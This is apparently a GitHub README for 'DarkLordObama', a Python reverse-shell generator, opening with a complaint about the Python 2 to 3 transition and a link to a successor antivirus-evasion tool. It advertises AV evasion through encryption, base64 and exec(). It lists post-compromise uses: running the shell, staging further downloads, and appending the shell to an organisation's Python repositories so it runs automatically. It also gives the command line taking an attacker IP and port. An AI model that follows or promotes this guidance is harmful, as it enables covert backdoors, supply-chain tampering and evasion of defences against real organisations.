The Python 2 to 3 transition was a clusterfuck, a atomic blast of breakage. https://lwn.net/Articles/843660/
It pisses me off, because my code worked PERFECTLY. But now PyPi won't properly install dependencies required for this to work. Even manually installing PyCrypto will through errors https://pypi.org/project/pycrypto/#files.
And I am not a big fan of half-assed hacks to fix things that should have been supported via some sort of compatibility.
Everyone, please move on along to the successor of DarkLordObama, EXOCET-Antivirus-Evasion. https://github.com/tanc7/EXOCET-AV-Evasion
Python is not IMO a programming language. It's a scripting language because it runs through a interpreter built primarily on C and various other languages.
Golang on the other hand, can be cross-compiled across multiple platforms with minimum modifications from a single codebase, usually for compatibility issues with the target operating system. But the point is, Golang WORKS.
I am planning to add inline assembly execution via Golang, which is considered impossible, but watch me do it. I will do it!
Chang Tan Lister Lister Unlimited Cybersecurity Solutions, LLC. changtan@listerunlimited.com
DLO generates a Pythonic reverse shell that as of July 29th, 2019, is undetectable on VirusTotal. It combines multiple won't-to-be-disclosed techniques (undiscloseable in detail) including but not limited to:
- "Command Segmentation"
- "AES Encryption" with a 32-bit key and a 16-bit initialization vector
- Base64 Encoding - It was a necessity
- Inline Python exec() functions, C asm() functions (will be added soon), Java/Jython, Cython, Ctypes
Please click this link for a demostration video of how to use
Currently you can, after you gain a foothold in organization
- Run the payload standalone.
- Replace the proof-of-concept code with a Metasploit python payload
- Taint/corrupt Python repositories: Locate the Python code repositories of a organization during a pentest and then copy-paste the entire code and append it to the bottom of the python module, guarantee auto-execution of the reverse shell when the code runs
- Use the payload as a stager to download additional payloads
- Use the payload against MacOS (MacBooks, iMacs, etc). They natively run Python 2.7.1
Run it as python darklordobama.py <attacker IP> <attacker listening port>
